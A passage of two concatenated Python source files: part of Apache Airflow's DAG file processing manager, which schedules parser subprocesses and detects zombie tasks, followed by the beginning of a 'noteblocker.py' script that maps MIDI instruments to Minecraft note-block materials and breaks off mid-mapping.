from airflow.utils.file import list_py_file_paths
from airflow.utils.helpers import reap_process_group
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.state import State
class SimpleDag(BaseDag):
"""
A simplified representation of a DAG that contains all attributes
required for instantiating and scheduling its associated tasks.
:param dag: the DAG
:type dag: airflow.models.DAG
:param pickle_id: ID associated with the pickled version of this DAG.
:type pickle_id: unicode
"""
def __init__(self, dag, pickle_id: Optional[str] = None):
self._dag_id: str = dag.dag_id
self._task_ids: List[str] = [task.task_id for task in dag.tasks]
self._full_filepath: str = dag.full_filepath
self._is_paused: bool = dag.is_paused
self._concurrency: int = dag.concurrency
self._pickle_id: Optional[str] = pickle_id
self._task_special_args: Dict[str, Any] = {}
for task in dag.tasks:
special_args = {}
if task.task_concurrency is not None:
special_args['task_concurrency'] = task.task_concurrency
if special_args:
self._task_special_args[task.task_id] = special_args
@property
def dag_id(self) -> str:
"""
:return: the DAG ID
:rtype: unicode
"""
return self._dag_id
@property
def task_ids(self) -> List[str]:
"""
:return: A list of task IDs that are in this DAG
:rtype: list[unicode]
"""
return self._task_ids
@property
def full_filepath(self) -> str:
"""
:return: The absolute path to the file that contains this DAG's definition
:rtype: unicode
"""
return self._full_filepath
@property
def concurrency(self) -> int:
"""
:return: maximum number of tasks that can run simultaneously from this DAG
:rtype: int
"""
return self._concurrency
@property
def is_paused(self) -> bool:
"""
:return: whether this DAG is paused or not
:rtype: bool
"""
return self._is_paused
@property
def pickle_id(self) -> Optional[str]:
"""
:return: The pickle ID for this DAG, if it has one. Otherwise None.
:rtype: unicode
"""
return self._pickle_id
@property
def task_special_args(self) -> Dict[str, Any]:
"""Special arguments of the task."""
return self._task_special_args
def get_task_special_arg(self, task_id: str, special_arg_name: str):
"""Retrieve special arguments of the task."""
if task_id in self._task_special_args and special_arg_name in self._task_special_args[task_id]:
return self._task_special_args[task_id][special_arg_name]
else:
return None
class SimpleDagBag(BaseDagBag):
"""
A collection of SimpleDag objects with some convenience methods.
"""
def __init__(self, simple_dags: List[SimpleDag]):
"""
Constructor.
:param simple_dags: SimpleDag objects that should be in this
:type list(airflow.utils.dag_processing.SimpleDag)
"""
self.simple_dags = simple_dags
self.dag_id_to_simple_dag: Dict[str, SimpleDag] = {}
for simple_dag in simple_dags:
self.dag_id_to_simple_dag[simple_dag.dag_id] = simple_dag
@property
def dag_ids(self) -> KeysView[str]:
"""
:return: IDs of all the DAGs in this
:rtype: list[unicode]
"""
return self.dag_id_to_simple_dag.keys()
def get_dag(self, dag_id: str) -> SimpleDag:
"""
:param dag_id: DAG ID
:type dag_id: unicode
:return: if the given DAG ID exists in the bag, return the BaseDag
corresponding to that ID. Otherwise, throw an Exception
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if dag_id not in self.dag_id_to_simple_dag:
raise AirflowException("Unknown DAG ID {}".format(dag_id))
return self.dag_id_to_simple_dag[dag_id]
class AbstractDagFileProcessorProcess(metaclass=ABCMeta):
"""
Processes a DAG file. See SchedulerJob.process_file() for more details.
"""
@abstractmethod
def start(self):
"""
Launch the process to process the file
"""
raise NotImplementedError()
@abstractmethod
def terminate(self, sigkill: bool = False):
"""
Terminate (and then kill) the process launched to process the file
"""
raise NotImplementedError()
@property
@abstractmethod
def pid(self) -> int:
"""
:return: the PID of the process launched to process the given file
"""
raise NotImplementedError()
@property
@abstractmethod
def exit_code(self) -> int:
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
raise NotImplementedError()
@property
@abstractmethod
def done(self) -> bool:
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
raise NotImplementedError()
@property
@abstractmethod
def result(self) -> Tuple[List[SimpleDag], int]:
"""
A list of simple dags found, and the number of import errors
:return: result of running SchedulerJob.process_file()
:rtype: tuple[list[airflow.utils.dag_processing.SimpleDag], int]
"""
raise NotImplementedError()
@property
@abstractmethod
def start_time(self):
"""
:return: When this started to process the file
:rtype: datetime
"""
raise NotImplementedError()
@property
@abstractmethod
def file_path(self):
"""
:return: the path to the file that this is processing
:rtype: unicode
"""
raise NotImplementedError()
class DagParsingStat(NamedTuple):
"""Information on processing progress"""
file_paths: List[str]
done: bool
all_files_processed: bool
class DagFileStat(NamedTuple):
"""Information about single processing of one file"""
num_dags: int
import_errors: int
last_finish_time: datetime
last_duration: float
run_count: int
class DagParsingSignal(enum.Enum):
"""All signals sent to parser."""
AGENT_HEARTBEAT = 'agent_heartbeat'
TERMINATE_MANAGER = 'terminate_manager'
END_MANAGER = 'end_manager'
class DagFileProcessorAgent(LoggingMixin):
"""
Agent for DAG file processing. It is responsible for all DAG parsing
related jobs in scheduler process. Mainly it can spin up DagFileProcessorManager
in a subprocess, collect DAG parsing results from it and communicate
signal/DAG parsing stat with it.
This class runs in the main `airflow scheduler` process.
"""
def __init__(self,
dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
async_mode):
"""
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: unicode
:param file_paths: list of file paths that contain DAG definitions
:type file_paths: list[unicode]
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_factory: function that creates processors for DAG
definition files. Arguments are (dag_definition_path, log_file_path)
:type processor_factory: (unicode, unicode, list) -> (AbstractDagFileProcessorProcess)
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param async_mode: Whether to start agent in async mode
:type async_mode: bool
"""
self._file_paths = file_paths
self._file_path_queue = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._processor_factory = processor_factory
self._processor_timeout = processor_timeout
self._async_mode = async_mode
# Map from file path to the processor
self._processors = {}
# Pipe for communicating signals
self._process = None
self._done = False
# Initialized as true so we do not deactivate w/o any actual DAG parsing.
self._all_files_processed = True
self._parent_signal_conn = None
self._collected_dag_buffer = []
def start(self):
"""
Launch DagFileProcessorManager processor and start DAG parsing loop in manager.
"""
self._parent_signal_conn, child_signal_conn = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=type(self)._run_processor_manager,
args=(
self._dag_directory,
self._file_paths,
self._max_runs,
self._processor_factory,
self._processor_timeout,
child_signal_conn,
self._async_mode,
)
)
self._process.start()
self.log.info("Launched DagFileProcessorManager with pid: %s", self._process.pid)
def heartbeat(self):
"""
Should only be used when launched DAG file processor manager in sync mode.
Send agent heartbeat signal to the manager, requesting that it runs one
processing "loop".
Call wait_until_finished to ensure that any launched processors have
finished before continuing
"""
if not self._process.is_alive():
return
try:
self._parent_signal_conn.send(DagParsingSignal.AGENT_HEARTBEAT)
except ConnectionError:
# If this died cos of an error then we will noticed and restarted
# when harvest_simple_dags calls _heartbeat_manager.
pass
def wait_until_finished(self):
"""Waits until DAG parsing is finished."""
while self._parent_signal_conn.poll():
try:
result = self._parent_signal_conn.recv()
except EOFError:
break
self._process_message(result)
if isinstance(result, DagParsingStat):
# In sync mode we don't send this message from the Manager
# until all the running processors have finished
return
@staticmethod
def _run_processor_manager(dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
async_mode):
# Make this process start as a new process group - that makes it easy
# to kill all sub-process of this at the OS-level, rather than having
# to iterate the child processes
os.setpgid(0, 0)
setproctitle("airflow scheduler -- DagFileProcessorManager")
# Reload configurations and settings to avoid collision with parent process.
# Because this process may need custom configurations that cannot be shared,
# e.g. RotatingFileHandler. And it can cause connection corruption if we
# do not recreate the SQLA connection pool.
os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER'] = 'True'
os.environ['AIRFLOW__CORE__COLORED_CONSOLE_LOG'] = 'False'
# Replicating the behavior of how logging module was loaded
# in logging_config.py
importlib.reload(import_module(airflow.settings.LOGGING_CLASS_PATH.rsplit('.', 1)[0]))
importlib.reload(airflow.settings)
airflow.settings.initialize()
del os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER']
processor_manager = DagFileProcessorManager(dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
async_mode)
processor_manager.start()
def harvest_simple_dags(self):
"""
Harvest DAG parsing results from result queue and sync metadata from stat queue.
:return: List of parsing result in SimpleDag format.
"""
# Receive any pending messages before checking if the process has exited.
while self._parent_signal_conn.poll():
try:
result = self._parent_signal_conn.recv()
except (EOFError, ConnectionError):
break
self._process_message(result)
simple_dags = self._collected_dag_buffer
self._collected_dag_buffer = []
# If it died unexpectedly restart the manager process
self._heartbeat_manager()
return simple_dags
def _process_message(self, message):
self.log.debug("Received message of type %s", type(message).__name__)
if isinstance(message, DagParsingStat):
self._sync_metadata(message)
else:
self._collected_dag_buffer.append(message)
def _heartbeat_manager(self):
"""
Heartbeat DAG file processor and restart it if we are not done.
"""
if self._process and not self._process.is_alive():
self._process.join(timeout=0)
if not self.done:
self.log.warning(
"DagFileProcessorManager (PID=%d) exited with exit code %d - re-launching",
self._process.pid, self._process.exitcode
)
self.start()
def _sync_metadata(self, stat):
"""
Sync metadata from stat queue and only keep the latest stat.
"""
self._file_paths = stat.file_paths
self._done = stat.done
self._all_files_processed = stat.all_files_processed
# pylint: disable=missing-docstring
@property
def file_paths(self):
return self._file_paths
@property
def done(self):
return self._done
@property
def all_files_processed(self):
return self._all_files_processed
def terminate(self):
"""
Send termination signal to DAG parsing processor manager
and expect it to terminate all DAG file processors.
"""
if self._process and self._process.is_alive():
self.log.info("Sending termination message to manager.")
try:
self._parent_signal_conn.send(DagParsingSignal.TERMINATE_MANAGER)
except ConnectionError:
pass
def end(self):
"""
Terminate (and then kill) the manager process launched.
:return:
"""
if not self._process:
self.log.warning('Ending without manager process.')
return
reap_process_group(self._process.pid, log=self.log)
self._parent_signal_conn.close()
class DagFileProcessorManager(LoggingMixin): # pylint: disable=too-many-instance-attributes
"""
Given a list of DAG definition files, this kicks off several processors
in parallel to process them and put the results to a multiprocessing.Queue
for DagFileProcessorAgent to harvest. The parallelism is limited and as the
processors finish, more are launched. The files are processed over and
over again, but no more often than the specified interval.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: unicode
:param file_paths: list of file paths that contain DAG definitions
:type file_paths: list[unicode]
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_factory: function that creates processors for DAG
definition files. Arguments are (dag_definition_path)
:type processor_factory: (unicode, unicode, list) -> (AbstractDagFileProcessorProcess)
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param signal_conn: connection to communicate signal with processor agent.
:type signal_conn: airflow.models.connection.Connection
:param async_mode: whether to start the manager in async mode
:type async_mode: bool
"""
def __init__(self,
dag_directory: str,
file_paths: List[str],
max_runs: int,
processor_factory: Callable[[str, List[Any]], AbstractDagFileProcessorProcess],
processor_timeout: timedelta,
signal_conn: Connection,
async_mode: bool = True):
self._file_paths = file_paths
self._file_path_queue: List[str] = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._processor_factory = processor_factory
self._signal_conn = signal_conn
self._async_mode = async_mode
self._parsing_start_time: Optional[datetime] = None
self._parallelism = conf.getint('scheduler', 'max_threads')
if 'sqlite' in conf.get('core', 'sql_alchemy_conn') and self._parallelism > 1:
self.log.warning(
"Because we cannot use more than 1 thread (max_threads = "
"%d ) when using sqlite. So we set parallelism to 1.", self._parallelism
)
self._parallelism = 1
# Parse and schedule each file no faster than this interval.
self._file_process_interval = conf.getint('scheduler',
'min_file_process_interval')
# How often to print out DAG file processing stats to the log. Default to
# 30 seconds.
self.print_stats_interval = conf.getint('scheduler',
'print_stats_interval')
# How many seconds do we wait for tasks to heartbeat before mark them as zombies.
self._zombie_threshold_secs = (
conf.getint('scheduler', 'scheduler_zombie_task_threshold'))
# Map from file path to the processor
self._processors: Dict[str, AbstractDagFileProcessorProcess] = {}
self._heartbeat_count = 0
# Map from file path to stats about the file
self._file_stats: Dict[str, DagFileStat] = {}
self._last_zombie_query_time = None
# Last time that the DAG dir was traversed to look for files
self.last_dag_dir_refresh_time = timezone.utcnow()
# Last time stats were printed
self.last_stat_print_time = timezone.datetime(2000, 1, 1)
# TODO: Remove magic number
self._zombie_query_interval = 10
self._zombies: List[SimpleTaskInstance] = []
# How long to wait before timing out a process to parse a DAG file
self._processor_timeout = processor_timeout
# How often to scan the DAGs directory for new files. Default to 5 minutes.
self.dag_dir_list_interval = conf.getint('scheduler',
'dag_dir_list_interval')
self._log = logging.getLogger('airflow.processor_manager')
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame): # pylint: disable=unused-argument
"""
Helper method to clean up DAG file processors to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
self.terminate()
self.end()
self.log.debug("Finished terminating DAG processors.")
sys.exit(os.EX_OK)
def start(self):
"""
Use multiple processes to parse and generate tasks for the
DAGs in parallel. By processing them in separate processes,
we can get parallelism and isolation from potentially harmful
user code.
"""
# Start a new process group
os.setpgid(0, 0)
self.log.info("Processing files using up to %s processes at a time ", self._parallelism)
self.log.info("Process each file at most once every %s seconds", self._file_process_interval)
self.log.info(
"Checking for new files in %s every %s seconds", self._dag_directory, self.dag_dir_list_interval
)
# In sync mode we want timeout=None -- wait forever until a message is received
poll_time = None # type: Optional[float]
if self._async_mode:
poll_time = 0.0
self.log.debug("Starting DagFileProcessorManager in async mode")
else:
poll_time = None
self.log.debug("Starting DagFileProcessorManager in sync mode")
# Used to track how long it takes us to get once around every file in the DAG folder.
self._parsing_start_time = timezone.utcnow()
while True:
loop_start_time = time.time()
if self._signal_conn.poll(poll_time):
agent_signal = self._signal_conn.recv()
self.log.debug("Recived %s singal from DagFileProcessorAgent", agent_signal)
if agent_signal == DagParsingSignal.TERMINATE_MANAGER:
self.terminate()
break
elif agent_signal == DagParsingSignal.END_MANAGER:
self.end()
sys.exit(os.EX_OK)
elif agent_signal == DagParsingSignal.AGENT_HEARTBEAT:
# continue the loop to parse dags
pass
elif not self._async_mode:
# In "sync" mode we don't want to parse the DAGs until we
# are told to (as that would open another connection to the
# SQLite DB which isn't a good practice
continue
self._refresh_dag_dir()
self._find_zombies() # pylint: disable=no-value-for-parameter
simple_dags = self.heartbeat()
for simple_dag in simple_dags:
self._signal_conn.send(simple_dag)
if not self._async_mode:
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
# Wait until the running DAG processors are finished before
# sending a DagParsingStat message back. This means the Agent
# can tell we've got to the end of this iteration when it sees
# this type of message
self.wait_until_finished()
# Collect anything else that has finished, but don't kick off any more processors
simple_dags = self.collect_results()
for simple_dag in simple_dags:
self._signal_conn.send(simple_dag)
self._print_stat()
all_files_processed = all(self.get_last_finish_time(x) is not None for x in self.file_paths)
max_runs_reached = self.max_runs_reached()
dag_parsing_stat = DagParsingStat(self._file_paths,
max_runs_reached,
all_files_processed,
)
self._signal_conn.send(dag_parsing_stat)
if max_runs_reached:
self.log.info("Exiting dag parsing loop as all files "
"have been processed %s times", self._max_runs)
break
if self._async_mode:
loop_duration = time.time() - loop_start_time
if loop_duration < 1:
poll_time = 1 - loop_duration
else:
poll_time = 0.0
def _refresh_dag_dir(self):
"""
Refresh file paths from dag dir if we haven't done it for too long.
"""
now = timezone.utcnow()
elapsed_time_since_refresh = (now - self.last_dag_dir_refresh_time).total_seconds()
if elapsed_time_since_refresh > self.dag_dir_list_interval:
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self._dag_directory)
self._file_paths = list_py_file_paths(self._dag_directory)
self.last_dag_dir_refresh_time = now
self.log.info("There are %s files in %s", len(self._file_paths), self._dag_directory)
self.set_file_paths(self._file_paths)
# noinspection PyBroadException
try:
self.log.debug("Removing old import errors")
self.clear_nonexistent_import_errors() # pylint: disable=no-value-for-parameter
except Exception: # pylint: disable=broad-except
self.log.exception("Error removing old import errors")
if STORE_SERIALIZED_DAGS:
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.dag import DagModel
SerializedDagModel.remove_deleted_dags(self._file_paths)
DagModel.deactivate_deleted_dags(self._file_paths)
def _print_stat(self):
"""
Occasionally print out stats about how fast the files are getting processed
"""
if (timezone.utcnow() - self.last_stat_print_time).total_seconds() > self.print_stats_interval:
if self._file_paths:
self._log_file_processing_stats(self._file_paths)
self.last_stat_print_time = timezone.utcnow()
@provide_session
def clear_nonexistent_import_errors(self, session):
"""
Clears import errors for files that no longer exist.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
"""
query = session.query(errors.ImportError)
if self._file_paths:
query = query.filter(
~errors.ImportError.filename.in_(self._file_paths)
)
query.delete(synchronize_session='fetch')
session.commit()
def _log_file_processing_stats(self, known_file_paths):
"""
Print out stats about how files are getting processed.
:param known_file_paths: a list of file paths that may contain Airflow
DAG definitions
:type known_file_paths: list[unicode]
:return: None
"""
# File Path: Path to the file containing the DAG definition
# PID: PID associated with the process that's processing the file. May
# be empty.
# Runtime: If the process is currently running, how long it's been
# running for in seconds.
# Last Runtime: If the process ran before, how long did it take to
# finish in seconds
# Last Run: When the file finished processing in the previous run.
headers = ["File Path",
"PID",
"Runtime",
"# DAGs",
"# Errors",
"Last Runtime",
"Last Run"]
rows = []
now = timezone.utcnow()
for file_path in known_file_paths:
last_runtime = self.get_last_runtime(file_path)
num_dags = self.get_last_dag_count(file_path)
num_errors = self.get_last_error_count(file_path)
file_name = os.path.basename(file_path)
file_name = os.path.splitext(file_name)[0].replace(os.sep, '.')
processor_pid = self.get_pid(file_path)
processor_start_time = self.get_start_time(file_path)
runtime = ((now - processor_start_time) if processor_start_time else None)
last_run = self.get_last_finish_time(file_path)
if last_run:
seconds_ago = (now - last_run).total_seconds()
Stats.gauge('dag_processing.last_run.seconds_ago.{}'.format(file_name), seconds_ago)
if runtime:
Stats.timing('dag_processing.last_duration.{}'.format(file_name), runtime)
# TODO: Remove before Airflow 2.0
Stats.timing('dag_processing.last_runtime.{}'.format(file_name), runtime)
rows.append((file_path,
processor_pid,
runtime,
num_dags,
num_errors,
last_runtime,
last_run))
# Sort by longest last runtime. (Can't sort None values in python3)
rows = sorted(rows, key=lambda x: x[3] or 0.0)
formatted_rows = []
for file_path, pid, runtime, num_dags, num_errors, last_runtime, last_run in rows:
formatted_rows.append((file_path,
pid,
"{:.2f}s".format(runtime.total_seconds()) if runtime else None,
num_dags,
num_errors,
"{:.2f}s".format(last_runtime) if last_runtime else None,
last_run.strftime("%Y-%m-%dT%H:%M:%S") if last_run else None
))
log_str = ("\n" +
"=" * 80 +
"\n" +
"DAG File Processing Stats\n\n" +
tabulate(formatted_rows, headers=headers) +
"\n" +
"=" * 80)
self.log.info(log_str)
def get_pid(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the PID of the process processing the given file or None if
the specified file is not being processed
:rtype: int
"""
if file_path in self._processors:
return self._processors[file_path].pid
return None
def get_all_pids(self):
"""
:return: a list of the PIDs for the processors that are running
:rtype: List[int]
"""
return [x.pid for x in self._processors.values()]
def get_last_runtime(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the runtime (in seconds) of the process of the last run, or
None if the file was never processed.
:rtype: float
"""
stat = self._file_stats.get(file_path)
return stat.last_duration if stat else None
def get_last_dag_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of dags loaded from that file, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.num_dags if stat else None
def get_last_error_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of import errors from processing, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.import_errors if stat else None
def get_last_finish_time(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the finish time of the process of the last run, or None if the
file was never processed.
:rtype: datetime
"""
stat = self._file_stats.get(file_path)
return stat.last_finish_time if stat else None
def get_start_time(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the start time of the process that's processing the
specified file or None if the file is not currently being processed
:rtype: datetime
"""
if file_path in self._processors:
return self._processors[file_path].start_time
return None
def get_run_count(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the number of times the given file has been parsed
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.run_count if stat else 0
def set_file_paths(self, new_file_paths):
"""
Update this with a new set of paths to DAG definition files.
:param new_file_paths: list of paths to DAG definition files
:type new_file_paths: list[unicode]
:return: None
"""
self._file_paths = new_file_paths
self._file_path_queue = [x for x in self._file_path_queue
if x in new_file_paths]
# Stop processors that are working on deleted files
filtered_processors = {}
for file_path, processor in self._processors.items():
if file_path in new_file_paths:
filtered_processors[file_path] = processor
else:
self.log.warning("Stopping processor for %s", file_path)
Stats.decr('dag_processing.processes')
processor.terminate()
self._file_stats.pop(file_path)
self._processors = filtered_processors
def wait_until_finished(self):
"""
Sleeps until all the processors are done.
"""
for processor in self._processors.values():
while not processor.done:
time.sleep(0.1)
def collect_results(self):
"""
Collect the result from any finished DAG processors
:return: a list of SimpleDags that were produced by processors that
have finished since the last time this was called
:rtype: list[airflow.utils.dag_processing.SimpleDag]
"""
self._kill_timed_out_processors()
finished_processors: Dict[str, AbstractDagFileProcessorProcess] = {}
running_processors: Dict[str, AbstractDagFileProcessorProcess] = {}
for file_path, processor in self._processors.items():
if processor.done:
self.log.debug("Processor for %s finished", file_path)
Stats.decr('dag_processing.processes')
now = timezone.utcnow()
finished_processors[file_path] = processor
stat = DagFileStat(
len(processor.result[0]) if processor.result is not None else 0,
processor.result[1] if processor.result is not None else -1,
now,
(now - processor.start_time).total_seconds(),
self.get_run_count(file_path) + 1,
)
self._file_stats[file_path] = stat
else:
running_processors[file_path] = processor
self._processors = running_processors
self.log.debug("%s/%s DAG parsing processes running",
len(self._processors), self._parallelism)
self.log.debug("%s file paths queued for processing",
len(self._file_path_queue))
# Collect all the DAGs that were found in the processed files
simple_dags = []
for file_path, processor in finished_processors.items():
if processor.result is None:
self.log.warning(
"Processor for %s exited with return code %s.",
processor.file_path, processor.exit_code
)
else:
for simple_dag in processor.result[0]:
simple_dags.append(simple_dag)
return simple_dags
def heartbeat(self):
"""
This should be periodically called by the manager loop. This method will
kick off new processes to process DAG definition files and read the
results from the finished processors.
:return: a list of SimpleDags that were produced by processors that
have finished since the last time this was called
:rtype: list[airflow.utils.dag_processing.SimpleDag]
"""
simple_dags = self.collect_results()
# Generate more file paths to process if we processed all the files
# already.
if not self._file_path_queue:
self.emit_metrics()
self._parsing_start_time = timezone.utcnow()
# If the file path is already being processed, or if a file was
# processed recently, wait until the next batch
file_paths_in_progress = self._processors.keys()
now = timezone.utcnow()
file_paths_recently_processed = []
for file_path in self._file_paths:
last_finish_time = self.get_last_finish_time(file_path)
if (last_finish_time is not None and
(now - last_finish_time).total_seconds() <
self._file_process_interval):
file_paths_recently_processed.append(file_path)
files_paths_at_run_limit = [file_path
for file_path, stat in self._file_stats.items()
if stat.run_count == self._max_runs]
files_paths_to_queue = list(set(self._file_paths) -
set(file_paths_in_progress) -
set(file_paths_recently_processed) -
set(files_paths_at_run_limit))
for file_path, processor in self._processors.items():
self.log.debug(
"File path %s is still being processed (started: %s)",
processor.file_path, processor.start_time.isoformat()
)
self.log.debug(
"Queuing the following files for processing:\n\t%s",
"\n\t".join(files_paths_to_queue)
)
for file_path in files_paths_to_queue:
if file_path not in self._file_stats:
self._file_stats[file_path] = DagFileStat(0, 0, None, None, 0)
self._file_path_queue.extend(files_paths_to_queue)
# Start more processors if we have enough slots and files to process
while self._parallelism - len(self._processors) > 0 and self._file_path_queue:
file_path = self._file_path_queue.pop(0)
processor = self._processor_factory(file_path, self._zombies)
Stats.incr('dag_processing.processes')
processor.start()
self.log.debug(
"Started a process (PID: %s) to generate tasks for %s",
processor.pid, file_path
)
self._processors[file_path] = processor
# Update heartbeat count.
self._heartbeat_count += 1
return simple_dags
@provide_session
def _find_zombies(self, session):
"""
Find zombie task instances, which are tasks haven't heartbeated for too long
and update the current zombie list.
"""
now = timezone.utcnow()
zombies: List[SimpleTaskInstance] = []
if not self._last_zombie_query_time or \
(now - self._last_zombie_query_time).total_seconds() > self._zombie_query_interval:
# to avoid circular imports
from airflow.jobs import LocalTaskJob as LJ
self.log.info("Finding 'running' jobs without a recent heartbeat")
TI = airflow.models.TaskInstance
limit_dttm = timezone.utcnow() - timedelta(
seconds=self._zombie_threshold_secs)
self.log.info("Failing jobs without heartbeat after %s", limit_dttm)
tis = (
session.query(TI)
.join(LJ, TI.job_id == LJ.id)
.filter(TI.state == State.RUNNING)
.filter(
or_(
LJ.state != State.RUNNING,
LJ.latest_heartbeat < limit_dttm,
)
).all()
)
self._last_zombie_query_time = timezone.utcnow()
for ti in tis:
sti = SimpleTaskInstance(ti)
self.log.info(
"Detected zombie job with dag_id %s, task_id %s, and execution date %s",
sti.dag_id, sti.task_id, sti.execution_date.isoformat())
zombies.append(sti)
self._zombies = zombies
def _kill_timed_out_processors(self):
"""
Kill any file processors that timeout to defend against process hangs.
"""
now = timezone.utcnow()
for file_path, processor in self._processors.items():
duration = now - processor.start_time
if duration > self._processor_timeout:
self.log.error(
"Processor for %s with PID %s started at %s has timed out, "
"killing it.",
file_path, processor.pid, processor.start_time.isoformat())
Stats.decr('dag_processing.processes')
Stats.incr('dag_processing.processor_timeouts')
# TODO: Remove ater Airflow 2.0
Stats.incr('dag_file_processor_timeouts')
processor.kill()
def max_runs_reached(self):
"""
:return: whether all file paths have been processed max_runs times
"""
if self._max_runs == -1: # Unlimited runs.
return False
for stat in self._file_stats.values():
if stat.run_count < self._max_runs:
return False
if self._heartbeat_count < self._max_runs:
return False
return True
def terminate(self):
"""
Stops all running processors
:return: None
"""
for processor in self._processors.values():
Stats.decr('dag_processing.processes')
processor.terminate()
def end(self):
"""
Kill all child processes on exit since we don't want to leave
them as orphaned.
"""
pids_to_kill = self.get_all_pids()
if pids_to_kill:
# First try SIGTERM
this_process = psutil.Process(os.getpid())
# Only check child processes to ensure that we don't have a case
# where we kill the wrong process because a child process died
# but the PID got reused.
child_processes = [x for x in this_process.children(recursive=True)
if x.is_running() and x.pid in pids_to_kill]
for child in child_processes:
self.log.info("Terminating child PID: %s", child.pid)
child.terminate()
# TODO: Remove magic number
timeout = 5
self.log.info("Waiting up to %s seconds for processes to exit...", timeout)
try:
psutil.wait_procs(
child_processes, timeout=timeout,
callback=lambda x: self.log.info('Terminated PID %s', x.pid))
except psutil.TimeoutExpired:
self.log.debug("Ran out of time while waiting for processes to exit")
# Then SIGKILL
child_processes = [x for x in this_process.children(recursive=True)
if x.is_running() and x.pid in pids_to_kill]
if child_processes:
self.log.info("SIGKILL processes that did not terminate gracefully")
for child in child_processes:
self.log.info("Killing child PID: %s", child.pid)
child.kill()
child.wait()
def emit_metrics(self):
"""
Emmit metrics about dag parsing summary
This is called once every time around the parsing "loop" - i.e. after
all files have been parsed.
"""
parse_time = (timezone.utcnow() - self._parsing_start_time).total_seconds()
Stats.gauge('dag_processing.total_parse_time', parse_time)
Stats.gauge('dagbag_size', sum(stat.num_dags for stat in self._file_stats.values()))
Stats.gauge('dag_processing.import_errors',
sum(stat.import_errors for stat in self._file_stats.values()))
# TODO: Remove before Airflow 2.0
Stats.gauge('collect_dags', parse_time)
Stats.gauge('dagbag_import_errors', sum(stat.import_errors for stat in self._file_stats.values()))
# pylint: disable=missing-docstring
@property
def file_paths(self):
return self._file_paths
|
noteblocker.py
|
import os
import sys
import time
import shutil
import subprocess
import threading
import traceback
import math
def pip_import(module, pipname=None):
pipname = pipname or module
try:
globals()[module] = __import__(module)
except ImportError:
print("ERROR: could not load module " + module + " [" + pipname + "]")
print("you need to install it yourself by running:")
print("python -m pip install " + pipname)
input()
pip_import("mido")
pip_import("requests")
class PathManager:
def __init__(self, root=None):
self.base_location = root or os.path.dirname(os.path.realpath(__file__))
def get_path(self, path, *args):
if ''.join(path if isinstance(path, list) else [path]).startswith('$'):
return os.path.join(self.base_location, *([path.split('/')[0][1:]] + path.split('/')[1:] + list(args)))
return os.path.join(*path.split('/') + list(args))
def assert_directory(self, path):
path = self.get_path(path)
if (not os.path.isdir(path)):
os.makedirs(path)
def default_file(self, path, content):
path = self.get_path(path)
self.assert_directory(os.path.dirname(path))
if not os.path.isfile(path):
file = open(path, 'w')
file.write(content)
file.close()
def get_json(self, path, mode='r'):
file = open(self.get_path(path), mode)
content = json.loads(file.read())
file.close()
return content
def set_json(self, path, content, mode='w'):
output = json.dumps(content)
file = open(self.get_path(path), mode)
file.write(output)
file.close()
def read_file(self, path, mode='r'):
file = open(self.get_path(path), mode)
content = file.read()
file.close()
return content
def set_file(self, path, content, mode='w'):
file = open(self.get_path(path), mode)
file.write(content)
file.close()
class FilePathInputManager:
def __init__(self):
self.tkinter = None
self.filedialog = None
try:
self.tkinter = __import__("tkinter")
self.filedialog = __import__("tkinter.filedialog")
except:
pass
def get(self):
if self.tkinter == None or self.filedialog == None:
return self.get_fallback()
self.tk = self.tkinter.Tk()
self.tk.withdraw()
while True:
file = self.tkinter.filedialog.askopenfilename(filetypes=[('MIDI Files', ('.midi', '.mid'))])
if (file != None):
self.tk.destroy()
return file
def get_fallback(self):
print("enter a file path")
while True:
file = input()
if os.path.isfile(file):
break
return file
class MidiTranslationManager:
blocks = {
"bass": "oak_planks",
"snare": "sand",
"hat": "glass",
"basedrum": "stone",
"bell": "gold_block",
"flute": "clay",
"chime": "packed_ice",
"guitar": "white_wool",
"xylophone": "bone_block",
"piano": "iron_block"
}
midi = {
"0,1,2,3,4,5,6": "piano",
"7,8": "guitar",
"9,10,11,12": "chime",
"13,14": "xylophone",
"15": "bell",
"16": "guitar",
